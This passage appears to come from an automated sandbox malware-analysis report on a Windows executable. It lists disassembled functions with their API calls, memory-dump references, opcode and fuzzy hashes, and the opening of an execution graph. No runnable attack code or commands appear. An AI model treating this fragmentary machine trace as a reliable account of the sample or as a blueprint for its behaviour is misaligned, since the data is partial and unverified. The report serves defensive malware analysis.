                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(0022437C,?,0019563F,00224EAC,001B5740,00000000,00191C44), ref: 001993B7
                                                                                                                                                                                                                            • WakeAllConditionVariable.KERNEL32(00224378,?,0019563F,00224EAC,001B5740,00000000,00191C44), ref: 001993C2
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                                                                                                                                                                                                            • String ID: |C"
                                                                                                                                                                                                                            • API String ID: 1466638765-2896041220
                                                                                                                                                                                                                            • Opcode ID: 4bbd69df741be18a8bb3a96e09b33b264d92f6b828e376f0c71a00075ace9cc4
                                                                                                                                                                                                                            • Instruction ID: bb9c42844a680a37ec00da99dac736a05e5cee0a0b4b123795f4479544d7521b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bbd69df741be18a8bb3a96e09b33b264d92f6b828e376f0c71a00075ace9cc4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1F06D74541210EFC304FF99F888C957BB9EB0E751B04406AFE0983B20CB34A880CF50
                                                                                                                                                                                                                            Function 001A9DB0 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,016E13CA), ref: 001A9E13
                                                                                                                                                                                                                              • Part of subcall function 001ACDFB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,001ACB79,?,00000000,-00000008), ref: 001ACEA7
                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001AA06E
                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001AA0B6
                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 001AA159
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2112829910-0
                                                                                                                                                                                                                            • Opcode ID: f82a87537b8027e7676200c750c1b61b831474968f170b13568869e79486f1ab
                                                                                                                                                                                                                            • Instruction ID: 80c44f9e7b3c098a654754e3b3f3022cad9a2736861c239906b449d63f08c166
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f82a87537b8027e7676200c750c1b61b831474968f170b13568869e79486f1ab
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0D159B9E00258AFCF15CFA8D880AEEBBB5FF19304F58412AE856E7351D730A945CB51
                                                                                                                                                                                                                            Function 0019CBAB Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1740715915-0
                                                                                                                                                                                                                            • Opcode ID: 3d6d01937345e1946442e54d5403bf07c2f7eef6f407ef932743465528b97e48
                                                                                                                                                                                                                            • Instruction ID: 44baabdd045da25a0340e7adba98b2fef7e7bf6ed12b15654a89f0bf7ffd086d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d6d01937345e1946442e54d5403bf07c2f7eef6f407ef932743465528b97e48
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60511572604606AFEF298F54D841BBA7BA4FF14310F28412DE88A87691E731FC80DBD0
                                                                                                                                                                                                                            Function 001AD0BB Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001ACDFB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,001ACB79,?,00000000,-00000008), ref: 001ACEA7
                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 001AD11F
                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 001AD126
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 001AD160
                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 001AD167
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1913693674-0
                                                                                                                                                                                                                            • Opcode ID: b2ae98e7da4612b0963887303724d478492abf38d71f1a1a90cc68f55677110c
                                                                                                                                                                                                                            • Instruction ID: 415a286567e3b855de8e1ef82d3ef39f628f2fa056607303e51bd92e3ec4b9c5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2ae98e7da4612b0963887303724d478492abf38d71f1a1a90cc68f55677110c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0521D7B9600A05AFDB20AF65EC8196BB7A9FF173747018918F86BD7950DB30EC40CB90
                                                                                                                                                                                                                            Function 001A32F6 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 76d021a6275b02dc72a488f8a54d17875122526cb567c047d7589e603110672e
                                                                                                                                                                                                                            • Instruction ID: 2b10e350dcfd252cc88c4a7467e48b625b34aa125e4615c957ac3890210c1471
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76d021a6275b02dc72a488f8a54d17875122526cb567c047d7589e603110672e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B921AC79608605AFDF24AF65DC81A6AB7A9FF223647108528F876D7240DF30EE0097A0
                                                                                                                                                                                                                            Function 001AE06A Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 001AE072
                                                                                                                                                                                                                              • Part of subcall function 001ACDFB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,001ACB79,?,00000000,-00000008), ref: 001ACEA7
                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001AE0AA
                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001AE0CA
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 158306478-0
                                                                                                                                                                                                                            • Opcode ID: 198850b3caed8443665e0fc470f49dc6d9fe8da11d562bbf05b473a54870e36f
                                                                                                                                                                                                                            • Instruction ID: c4f3bcc0fefb6dffa883ba478fc9aebd40430063a3a59b4c8a091f543f8b3440
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 198850b3caed8443665e0fc470f49dc6d9fe8da11d562bbf05b473a54870e36f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F211C4B9605126BF662127B66C8DCAF6DACEFA73A87140124F40192101FF749E0046F1
                                                                                                                                                                                                                            Function 001B3966 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,00000000,?,001B2877,00000000,00000001,00000000,016E13CA,?,001AA1AD,016E13CA,00000000,00000000), ref: 001B397D
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,001B2877,00000000,00000001,00000000,016E13CA,?,001AA1AD,016E13CA,00000000,00000000,016E13CA,016E13CA,?,001AA734,00000000), ref: 001B3989
                                                                                                                                                                                                                              • Part of subcall function 001B394F: CloseHandle.KERNEL32(FFFFFFFE,001B3999,?,001B2877,00000000,00000001,00000000,016E13CA,?,001AA1AD,016E13CA,00000000,00000000,016E13CA,016E13CA), ref: 001B395F
                                                                                                                                                                                                                            • ___initconout.LIBCMT ref: 001B3999
                                                                                                                                                                                                                              • Part of subcall function 001B3911: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001B3940,001B2864,016E13CA,?,001AA1AD,016E13CA,00000000,00000000,016E13CA), ref: 001B3924
                                                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,?,001B2877,00000000,00000001,00000000,016E13CA,?,001AA1AD,016E13CA,00000000,00000000,016E13CA), ref: 001B39AE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                                                                                                            • Opcode ID: 5a279adddf80d2851e3f7da6f9dc8d54a493b09e375002b7206ca1ecfd42163a
                                                                                                                                                                                                                            • Instruction ID: 4a82ce3324146a4e7eee392a4b2af1dafbdb7f42e6ee5c91e6cb204837018ce7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a279adddf80d2851e3f7da6f9dc8d54a493b09e375002b7206ca1ecfd42163a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36F01C36000124BBCF222FD5DC09AC93F26FB593A1B044510FA2995531DB728960DB90
                                                                                                                                                                                                                            Function 0019D1A7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • EncodePointer.KERNEL32(00000000,?), ref: 0019D1CC
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: EncodePointer
                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                            • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                            • Opcode ID: 663f53f17dc5cb0b2082af460c00c0fc03cbce5cab81f9aa99cad33642d165ad
                                                                                                                                                                                                                            • Instruction ID: 07f8a9737d57a851f37ecd7612552f8a851203cf77b093fd3e260f43affc3ca8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 663f53f17dc5cb0b2082af460c00c0fc03cbce5cab81f9aa99cad33642d165ad
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3416772900209AFDF16DFA8DC81AEEBBB5FF48304F188199F905A7261D335D960DB91
                                                                                                                                                                                                                            Function 00196AB5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00196B3D
                                                                                                                                                                                                                            • RaiseException.KERNEL32(?,?,?,?,?), ref: 00196B62
                                                                                                                                                                                                                              • Part of subcall function 0019AD9B: RaiseException.KERNEL32(E06D7363,00000001,00000003,00191365,?,?,?,?,00191365,?,001C0B30), ref: 0019ADFB
                                                                                                                                                                                                                              • Part of subcall function 0019DD93: IsProcessorFeaturePresent.KERNEL32(00000017,0019F12B,?,?,?,?,00000000,001A08D9,?,?,?), ref: 0019DDAF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                            • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                            • Opcode ID: 9d9b905d4541bcef728b0a9a14bcb7da6c701aa8d5268635deb8d015bde5a344
                                                                                                                                                                                                                            • Instruction ID: b38639acfb360cb389c408dd6f724249d5c1afab3c51b8014ee1a60b1359d178
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d9b905d4541bcef728b0a9a14bcb7da6c701aa8d5268635deb8d015bde5a344
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E321AF32E00218EBCF24DFE5D945AAEB7B9FF14710F59041DE40AAB650D734AD45CBA1
                                                                                                                                                                                                                            Function 0019175B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00191762
                                                                                                                                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0019179A
                                                                                                                                                                                                                              • Part of subcall function 001988C0: _Yarn.LIBCPMT ref: 001988DF
                                                                                                                                                                                                                              • Part of subcall function 001988C0: _Yarn.LIBCPMT ref: 00198903
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                                                                                            • API String ID: 1908188788-1405518554
                                                                                                                                                                                                                            • Opcode ID: 0df7849ff7cfebbcd5dbbdb2b207093ca5df9a34e17bcaecbb4e3a8357520024
                                                                                                                                                                                                                            • Instruction ID: 8c400f80431aa8970872495b4f9b5934a25b1fbbd73f80e5053ba9b03ae17468
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0df7849ff7cfebbcd5dbbdb2b207093ca5df9a34e17bcaecbb4e3a8357520024
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BBF03A72919B409E8334DFBA9481443FBE4BE293113908E2FE0DEC3A11D730E404CB6A
                                                                                                                                                                                                                            Function 001993CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(0022437C,00224E80,00224EAC,?,00195625,00224EAC,00000000,00191C44), ref: 001993D6
                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(0022437C,?,00195625,00224EAC,00000000,00191C44), ref: 00199410
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                                                                                                            • String ID: |C"
                                                                                                                                                                                                                            • API String ID: 17069307-2896041220
                                                                                                                                                                                                                            • Opcode ID: eb08651ef4e4da64151814d3c5c8df09ecb9096a80a1a973595a24ec834c7bf7
                                                                                                                                                                                                                            • Instruction ID: fe499e36c65f86bab9425d7a9c7fbe9fe5728fca4708045a0cd5c08291643ab4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb08651ef4e4da64151814d3c5c8df09ecb9096a80a1a973595a24ec834c7bf7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7F0A734100101DFCB20BF6DE884965BB78FB46771F20036EE955836E0C7341983CA21

                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                            Execution Coverage:5.2%
                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                            Signature Coverage:2.9%
                                                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                                                            Total number of Limit Nodes:28
                                                                                                                                                                                                                            execution_graph 73728 4184f0 73729 4184f2 73728->73729 73780 402b68 73729->73780 73738 401284 25 API calls 73739 418521 73738->73739 73740 401284 25 API calls 73739->73740 73741 41852b 73740->73741 73895 40148a GetPEB 73741->73895 73743 418535 73744 401284 25 API calls 73743->73744 73745 41853f 73744->73745 73746 401284 25 API calls 73745->73746 73748 418549 73746->73748 73747 401284 25 API calls 73749 418553 73747->73749 73748->73747 73896 4014a2 GetPEB 73749->73896 73751 41855d 73752 401284 25 API calls 73751->73752 73753 418567 73752->73753 73754 401284 25 API calls 73753->73754 73755 418571 73754->73755 73756 401284 25 API calls 73755->73756 73757 41857b 73756->73757 73897 4014f9 73757->73897 73760 401284 25 API calls 73761 41858f 73760->73761 73762 401284 25 API calls 73761->73762 73763 418599 73762->73763 73764 401284 25 API calls 73763->73764 73765 4185a3 73764->73765 73920 401666 GetTempPathW 73765->73920 73768 401284 25 API calls 73769 4185b2 73768->73769 73770 401284 25 API calls 73769->73770 73771 4185bc 73770->73771 73772 401284 25 API calls 73771->73772 73773 4185c6 73772->73773 73932 417083 73773->73932 74357 4047e8 GetProcessHeap HeapAlloc 73780->74357 73783 4047e8 3 API calls 73784 402b93 73783->73784 73785 4047e8 3 API calls 73784->73785 73786 402bac 73785->73786 73787 4047e8 3 API calls 73786->73787 73788 402bc3 73787->73788 73789 4047e8 3 API calls 73788->73789 73790 402bda 73789->73790 73791 4047e8 3 API calls 73790->73791 73792 402bf0 73791->73792 73793 4047e8 3 API calls 73792->73793 73794 402c07 73793->73794 73795 4047e8 3 API calls 73794->73795 73796 402c1e 73795->73796 73797 4047e8 3 API calls 73796->73797 73798 402c38 73797->73798 73799 4047e8 3 API calls 73798->73799 73800 402c4f 73799->73800 73801 4047e8 3 API calls 73800->73801 73802 402c66 73801->73802 73803 4047e8 3 API calls 73802->73803 73804 402c7d 73803->73804 73805 4047e8 3 API calls 73804->73805 73806 402c93 73805->73806 73807 4047e8 3 API calls 73806->73807 73808 402caa 73807->73808 73809 4047e8 3 API calls 73808->73809 73810 402cc1 73809->73810 73811 4047e8 3 API calls 73810->73811 73812 402cd8 73811->73812 73813 4047e8 3 API calls 73812->73813 73814 402cf2 73813->73814 73815 4047e8 3 API calls 73814->73815 73816 402d09 73815->73816 73817 4047e8 3 API calls 73816->73817 73818 402d20 73817->73818 73819 4047e8 3 API calls 73818->73819 73820 402d37 73819->73820 73821 4047e8 3 API calls 73820->73821 73822 402d4e 73821->73822 73823 4047e8 3 API calls 73822->73823 73824 402d65 73823->73824 73825 4047e8 3 API calls 73824->73825 73826 402d7c 73825->73826 73827 4047e8 3 API calls 73826->73827 73828 402d92 73827->73828 73829 4047e8 3 API calls 73828->73829 73830 402dac 73829->73830 73831 4047e8 3 API calls 73830->73831 73832 402dc3 73831->73832 73833 4047e8 3 API calls 73832->73833 73834 402dda 73833->73834 73835 4047e8 3 API calls 73834->73835 73836 402df1 73835->73836 73837 4047e8 3 API calls 73836->73837 73838 402e07 73837->73838 73839 4047e8 3 API calls 73838->73839 73840 402e1e 73839->73840 73841 4047e8 3 API calls 73840->73841 73842 402e35 73841->73842 73843 4047e8 3 API calls 73842->73843 73844 402e4c 73843->73844 73845 4047e8 3 API calls 73844->73845 73846 402e66 